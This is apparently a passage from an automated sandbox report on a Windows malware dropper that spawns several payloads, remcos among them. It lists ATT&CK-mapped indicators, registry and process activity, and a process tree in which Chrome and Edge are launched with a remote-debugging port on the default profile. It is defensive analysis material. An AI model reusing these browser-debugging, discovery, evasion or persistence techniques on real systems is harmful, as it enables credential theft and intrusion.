behavioral2/memory/4440-925-0x00007FFA562D0000-0x00007FFA562FE000-memory.dmp	upx
behavioral2/memory/5928-922-0x00007FFA569A0000-0x00007FFA56D17000-memory.dmp	upx
behavioral2/memory/4440-921-0x00007FFA50120000-0x00007FFA50291000-memory.dmp	upx
behavioral2/memory/5928-920-0x00007FFA57210000-0x00007FFA572C7000-memory.dmp	upx
behavioral2/memory/4440-918-0x00007FFA56740000-0x00007FFA5675E000-memory.dmp	upx
behavioral2/memory/4440-917-0x00007FFA57CE0000-0x00007FFA57CF8000-memory.dmp	upx
behavioral2/memory/4440-916-0x00007FFA56760000-0x00007FFA5678C000-memory.dmp	upx
behavioral2/memory/5928-915-0x00007FFA58550000-0x00007FFA5857E000-memory.dmp	upx
behavioral2/memory/5928-1044-0x00007FFA6BF80000-0x00007FFA6BFA4000-memory.dmp	upx
behavioral2/memory/5928-1053-0x00007FFA57210000-0x00007FFA572C7000-memory.dmp	upx
behavioral2/memory/5928-1054-0x00007FFA569A0000-0x00007FFA56D17000-memory.dmp	upx
behavioral2/memory/5928-1052-0x00007FFA58550000-0x00007FFA5857E000-memory.dmp	upx
behavioral2/memory/5928-1043-0x00007FFA58A50000-0x00007FFA58EB5000-memory.dmp	upx
behavioral2/memory/664-1128-0x00007FFA4F930000-0x00007FFA4FD95000-memory.dmp	upx
behavioral2/memory/664-1131-0x00007FFA672A0000-0x00007FFA672AF000-memory.dmp	upx
behavioral2/memory/664-1130-0x00007FFA56790000-0x00007FFA567B4000-memory.dmp	upx
behavioral2/memory/664-1148-0x00007FFA579F0000-0x00007FFA57A08000-memory.dmp	upx

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\sysnldcvmr.exe	o.exe
File opened for modification	C:\Windows\sysnldcvmr.exe	o.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Program crash 2 IoCs

pid	pid_target	Process	procid_target
1448	5208	WerFault.exe	549
4200	5220	WerFault.exe	601

System Location Discovery: System Language Discovery 1 TTPs 17 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BeamNG.UI.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	maza-0.16.3-win64-setup-unsigned.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	iexplore.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1757527941.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	5447jsX.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	VBVEd6f.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	o.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	file.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sysnldcvmr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	remcos.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	hhnjqu9y.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7cl16anh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 4 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4072	cmd.exe
5232	netsh.exe
5932	cmd.exe
2916	netsh.exe

NSIS installer 1 IoCs

installer

resource	yara_rule
behavioral2/files/0x0007000000023cd7-71.dat	nsis_installer_2

Checks processor information in registry 2 TTPs 5 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	VBVEd6f.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	VBVEd6f.exe

Delays execution with timeout.exe 36 IoCs

evasion

pid	Process
5404	timeout.exe
3780	timeout.exe
3780	timeout.exe
2416	timeout.exe
5960	timeout.exe
1948	timeout.exe
5912	timeout.exe
5196	timeout.exe
852	timeout.exe
5312	timeout.exe
2728	timeout.exe
3016	timeout.exe
5956	timeout.exe
1688	timeout.exe
4420	timeout.exe
5212	timeout.exe
876	timeout.exe
1260	timeout.exe
4384	timeout.exe
2688	timeout.exe
3864	timeout.exe
2532	timeout.exe
5760	timeout.exe
2528	timeout.exe
208	timeout.exe
4800	timeout.exe
5848	timeout.exe
5844	timeout.exe
4256	timeout.exe
2528	timeout.exe
2704	timeout.exe
328	timeout.exe
1160	timeout.exe
6048	timeout.exe
1840	timeout.exe
3764	timeout.exe

Detects videocard installed 1 TTPs 6 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2656	WMIC.exe
5836	WMIC.exe
5344	WMIC.exe
856	WMIC.exe
5152	WMIC.exe
5872	WMIC.exe

Enumerates system info in registry 2 TTPs 8 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Gathers system information 1 TTPs 2 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
5756	systeminfo.exe
2728	systeminfo.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
4408	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133771352578419360"	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	file.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
5192	schtasks.exe

Suspicious behavior: EnumeratesProcesses 45 IoCs

pid	Process
4824	VBVEd6f.exe
4824	VBVEd6f.exe
4824	VBVEd6f.exe
4824	VBVEd6f.exe
1916	chrome.exe
1916	chrome.exe
4824	VBVEd6f.exe
4824	VBVEd6f.exe
4824	VBVEd6f.exe
4824	VBVEd6f.exe
4388	msedge.exe
4388	msedge.exe
6012	msedge.exe
6012	msedge.exe
6012	msedge.exe
6012	msedge.exe
5996	msedge.exe
5996	msedge.exe
5996	msedge.exe
4824	VBVEd6f.exe
4824	VBVEd6f.exe
1724	hhnjqu9y.exe
1724	hhnjqu9y.exe
4316	powershell.exe
4316	powershell.exe
5464	powershell.exe
5464	powershell.exe
5464	powershell.exe
4316	powershell.exe
5456	powershell.exe
5456	powershell.exe
5456	powershell.exe
1412	powershell.exe
1412	powershell.exe
1412	powershell.exe
648	86635797.exe
648	86635797.exe
4184	powershell.exe
4184	powershell.exe
4184	powershell.exe
4496	powershell.exe
4496	powershell.exe
4496	powershell.exe
1816	powershell.exe
1816	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
3392	remcos.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

pid	Process
1916	chrome.exe
1916	chrome.exe
1916	chrome.exe
1916	chrome.exe
5996	msedge.exe
5996	msedge.exe
5996	msedge.exe
5996	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3100	4363463463464363463463463.exe
Token: SeDebugPrivilege	524	svchost.exe
Token: SeDebugPrivilege	4736	BeamNG.UI.exe
Token: SeShutdownPrivilege	1916	chrome.exe
Token: SeCreatePagefilePrivilege	1916	chrome.exe
Token: SeShutdownPrivilege	1916	chrome.exe
Token: SeCreatePagefilePrivilege	1916	chrome.exe
Token: SeShutdownPrivilege	1916	chrome.exe
Token: SeCreatePagefilePrivilege	1916	chrome.exe
Token: SeShutdownPrivilege	1916	chrome.exe
Token: SeCreatePagefilePrivilege	1916	chrome.exe
Token: SeShutdownPrivilege	1916	chrome.exe
Token: SeCreatePagefilePrivilege	1916	chrome.exe
Token: SeShutdownPrivilege	1916	chrome.exe
Token: SeCreatePagefilePrivilege	1916	chrome.exe
Token: SeShutdownPrivilege	1916	chrome.exe
Token: SeCreatePagefilePrivilege	1916	chrome.exe
Token: SeDebugPrivilege	360	WindowsDataUpdater.exe
Token: SeIncreaseQuotaPrivilege	5480	WMIC.exe
Token: SeSecurityPrivilege	5480	WMIC.exe
Token: SeTakeOwnershipPrivilege	5480	WMIC.exe
Token: SeLoadDriverPrivilege	5480	WMIC.exe
Token: SeSystemProfilePrivilege	5480	WMIC.exe
Token: SeSystemtimePrivilege	5480	WMIC.exe
Token: SeProfSingleProcessPrivilege	5480	WMIC.exe
Token: SeIncBasePriorityPrivilege	5480	WMIC.exe
Token: SeCreatePagefilePrivilege	5480	WMIC.exe
Token: SeBackupPrivilege	5480	WMIC.exe
Token: SeRestorePrivilege	5480	WMIC.exe
Token: SeShutdownPrivilege	5480	WMIC.exe
Token: SeDebugPrivilege	5480	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5480	WMIC.exe
Token: SeRemoteShutdownPrivilege	5480	WMIC.exe
Token: SeUndockPrivilege	5480	WMIC.exe
Token: SeManageVolumePrivilege	5480	WMIC.exe
Token: 33	5480	WMIC.exe
Token: 34	5480	WMIC.exe
Token: 35	5480	WMIC.exe
Token: 36	5480	WMIC.exe
Token: SeDebugPrivilege	5456	tasklist.exe
Token: SeDebugPrivilege	4316	powershell.exe
Token: SeDebugPrivilege	5464	powershell.exe
Token: SeIncreaseQuotaPrivilege	5480	WMIC.exe
Token: SeSecurityPrivilege	5480	WMIC.exe
Token: SeTakeOwnershipPrivilege	5480	WMIC.exe
Token: SeLoadDriverPrivilege	5480	WMIC.exe
Token: SeSystemProfilePrivilege	5480	WMIC.exe
Token: SeSystemtimePrivilege	5480	WMIC.exe
Token: SeProfSingleProcessPrivilege	5480	WMIC.exe
Token: SeIncBasePriorityPrivilege	5480	WMIC.exe
Token: SeCreatePagefilePrivilege	5480	WMIC.exe
Token: SeBackupPrivilege	5480	WMIC.exe
Token: SeRestorePrivilege	5480	WMIC.exe
Token: SeShutdownPrivilege	5480	WMIC.exe
Token: SeDebugPrivilege	5480	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5480	WMIC.exe
Token: SeRemoteShutdownPrivilege	5480	WMIC.exe
Token: SeUndockPrivilege	5480	WMIC.exe
Token: SeManageVolumePrivilege	5480	WMIC.exe
Token: 33	5480	WMIC.exe
Token: 34	5480	WMIC.exe
Token: 35	5480	WMIC.exe
Token: 36	5480	WMIC.exe
Token: SeDebugPrivilege	5912	WindowsDataUpdater.exe

Suspicious use of FindShellTrayWindow 53 IoCs

pid	Process
1916	chrome.exe
1916	chrome.exe
1916	chrome.exe
1916	chrome.exe
1916	chrome.exe
1916	chrome.exe
1916	chrome.exe
1916	chrome.exe
1916	chrome.exe
1916	chrome.exe
1916	chrome.exe
1916	chrome.exe
1916	chrome.exe
1916	chrome.exe
1916	chrome.exe
1916	chrome.exe
1916	chrome.exe
1916	chrome.exe
1916	chrome.exe
1916	chrome.exe
1916	chrome.exe
1916	chrome.exe
1916	chrome.exe
1916	chrome.exe
1916	chrome.exe
1916	chrome.exe
5996	msedge.exe
5996	msedge.exe
5996	msedge.exe
5996	msedge.exe
5996	msedge.exe
5996	msedge.exe
5996	msedge.exe
5996	msedge.exe
5996	msedge.exe
5996	msedge.exe
5996	msedge.exe
5996	msedge.exe
5996	msedge.exe
5996	msedge.exe
5996	msedge.exe
5996	msedge.exe
5996	msedge.exe
5996	msedge.exe
5996	msedge.exe
5996	msedge.exe
5996	msedge.exe
5996	msedge.exe
5996	msedge.exe
5996	msedge.exe
5996	msedge.exe
3168	contorax.exe
3324	winmsbt.exe

Suspicious use of SendNotifyMessage 2 IoCs

pid	Process
3168	contorax.exe
3324	winmsbt.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
360	WindowsDataUpdater.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3100 wrote to memory of 3604	3100	4363463463464363463463463.exe	83
PID 3100 wrote to memory of 3604	3100	4363463463464363463463463.exe	83
PID 3100 wrote to memory of 524	3100	4363463463464363463463463.exe	84
PID 3100 wrote to memory of 524	3100	4363463463464363463463463.exe	84
PID 3100 wrote to memory of 4736	3100	4363463463464363463463463.exe	92
PID 3100 wrote to memory of 4736	3100	4363463463464363463463463.exe	92
PID 3100 wrote to memory of 4736	3100	4363463463464363463463463.exe	92
PID 3100 wrote to memory of 1900	3100	4363463463464363463463463.exe	93
PID 3100 wrote to memory of 1900	3100	4363463463464363463463463.exe	93
PID 3100 wrote to memory of 1900	3100	4363463463464363463463463.exe	93
PID 1900 wrote to memory of 3024	1900	5447jsX.exe	95
PID 1900 wrote to memory of 3024	1900	5447jsX.exe	95
PID 1900 wrote to memory of 3024	1900	5447jsX.exe	95
PID 1900 wrote to memory of 876	1900	5447jsX.exe	96
PID 1900 wrote to memory of 876	1900	5447jsX.exe	96
PID 1900 wrote to memory of 876	1900	5447jsX.exe	96
PID 1900 wrote to memory of 940	1900	5447jsX.exe	97
PID 1900 wrote to memory of 940	1900	5447jsX.exe	97
PID 1900 wrote to memory of 940	1900	5447jsX.exe	97
PID 1900 wrote to memory of 940	1900	5447jsX.exe	97
PID 1900 wrote to memory of 940	1900	5447jsX.exe	97
PID 1900 wrote to memory of 940	1900	5447jsX.exe	97
PID 1900 wrote to memory of 940	1900	5447jsX.exe	97
PID 1900 wrote to memory of 940	1900	5447jsX.exe	97
PID 1900 wrote to memory of 940	1900	5447jsX.exe	97
PID 3100 wrote to memory of 4824	3100	4363463463464363463463463.exe	98
PID 3100 wrote to memory of 4824	3100	4363463463464363463463463.exe	98
PID 3100 wrote to memory of 4824	3100	4363463463464363463463463.exe	98
PID 4824 wrote to memory of 1916	4824	VBVEd6f.exe	100
PID 4824 wrote to memory of 1916	4824	VBVEd6f.exe	100
PID 1916 wrote to memory of 4436	1916	chrome.exe	101
PID 1916 wrote to memory of 4436	1916	chrome.exe	101
PID 3100 wrote to memory of 3964	3100	4363463463464363463463463.exe	102
PID 3100 wrote to memory of 3964	3100	4363463463464363463463463.exe	102
PID 3100 wrote to memory of 3964	3100	4363463463464363463463463.exe	102
PID 1916 wrote to memory of 3944	1916	chrome.exe	103
PID 1916 wrote to memory of 3944	1916	chrome.exe	103
PID 1916 wrote to memory of 3944	1916	chrome.exe	103
PID 1916 wrote to memory of 3944	1916	chrome.exe	103
PID 1916 wrote to memory of 3944	1916	chrome.exe	103
PID 1916 wrote to memory of 3944	1916	chrome.exe	103
PID 1916 wrote to memory of 3944	1916	chrome.exe	103
PID 1916 wrote to memory of 3944	1916	chrome.exe	103
PID 1916 wrote to memory of 3944	1916	chrome.exe	103
PID 1916 wrote to memory of 3944	1916	chrome.exe	103
PID 1916 wrote to memory of 3944	1916	chrome.exe	103
PID 1916 wrote to memory of 3944	1916	chrome.exe	103
PID 1916 wrote to memory of 3944	1916	chrome.exe	103
PID 1916 wrote to memory of 3944	1916	chrome.exe	103
PID 1916 wrote to memory of 3944	1916	chrome.exe	103
PID 1916 wrote to memory of 3944	1916	chrome.exe	103
PID 1916 wrote to memory of 3944	1916	chrome.exe	103
PID 1916 wrote to memory of 3944	1916	chrome.exe	103
PID 1916 wrote to memory of 3944	1916	chrome.exe	103
PID 1916 wrote to memory of 3944	1916	chrome.exe	103
PID 1916 wrote to memory of 3944	1916	chrome.exe	103
PID 1916 wrote to memory of 3944	1916	chrome.exe	103
PID 1916 wrote to memory of 3944	1916	chrome.exe	103
PID 1916 wrote to memory of 3944	1916	chrome.exe	103
PID 1916 wrote to memory of 3944	1916	chrome.exe	103
PID 1916 wrote to memory of 3944	1916	chrome.exe	103
PID 1916 wrote to memory of 3944	1916	chrome.exe	103
PID 1916 wrote to memory of 3944	1916	chrome.exe	103
PID 1916 wrote to memory of 3944	1916	chrome.exe	103

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 4 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
484	attrib.exe
3460	attrib.exe
6120	attrib.exe
5816	attrib.exe

C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3100
- C:\Users\Admin\AppData\Local\Temp\Files\test8.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\test8.exe"
  2⤵
  - Executes dropped EXE
  PID:3604
- C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:524
- C:\Users\Admin\AppData\Local\Temp\Files\BeamNG.UI.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\BeamNG.UI.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:4736
- C:\Users\Admin\AppData\Local\Temp\Files\5447jsX.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\5447jsX.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1900
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:3024
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:876
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:940
- C:\Users\Admin\AppData\Local\Temp\Files\VBVEd6f.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\VBVEd6f.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:4824
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
    3⤵
    - Uses browser remote debugging
    - Enumerates system info in registry
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:1916
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa5a24cc40,0x7ffa5a24cc4c,0x7ffa5a24cc58
      4⤵
      PID:4436
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1900,i,8715491620027644607,6909718935559944026,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1896 /prefetch:2
      4⤵
      PID:3944
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2156,i,8715491620027644607,6909718935559944026,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2176 /prefetch:3
      4⤵
      PID:2356
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2268,i,8715491620027644607,6909718935559944026,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2224 /prefetch:8
      4⤵
      PID:4496
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3152,i,8715491620027644607,6909718935559944026,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3164 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:1852
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3172,i,8715491620027644607,6909718935559944026,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3212 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:3192
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3156,i,8715491620027644607,6909718935559944026,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4604 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:2140
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4768,i,8715491620027644607,6909718935559944026,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4780 /prefetch:8
      4⤵
      PID:676
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4964,i,8715491620027644607,6909718935559944026,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4972 /prefetch:8
      4⤵
      PID:4656
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5000,i,8715491620027644607,6909718935559944026,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5064 /prefetch:8
      4⤵
      PID:3364
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5152,i,8715491620027644607,6909718935559944026,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5168 /prefetch:8
      4⤵
      PID:1680
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5040,i,8715491620027644607,6909718935559944026,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5308 /prefetch:8
      4⤵
      PID:1172
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5064,i,8715491620027644607,6909718935559944026,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5044 /prefetch:8
      4⤵
      PID:392
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5464,i,8715491620027644607,6909718935559944026,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5544 /prefetch:2
      4⤵
      Uses browser remote debugging
      PID:5396
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
    3⤵
    - Uses browser remote debugging
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    PID:5996
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa5a2546f8,0x7ffa5a254708,0x7ffa5a254718
      4⤵
      Checks processor information in registry
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      PID:6012
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
